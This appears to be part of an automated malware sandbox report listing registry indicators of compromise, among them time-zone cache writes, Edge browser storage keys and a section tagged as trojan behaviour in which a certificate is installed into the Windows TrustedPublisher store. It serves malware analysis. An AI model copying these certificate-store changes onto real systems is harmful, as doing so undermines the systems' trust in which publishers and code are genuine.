Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2632 = "Norfolk Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	csrss.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "111"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\propapps.info	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info\NumberOfSubdoma = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.onlinecasinoground.nl	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info\Total = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.propapps.info	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "28"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "143"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "111"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\onlinecasinoground.nl\NumberO = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.onlinecasinoground.nl	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = d07f735dcc11d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{0DCD83DA-66EE-4AF4-9566-E623E004799B} = "0"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

vpn.tmptapinstall.exefile.exeSetup.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe
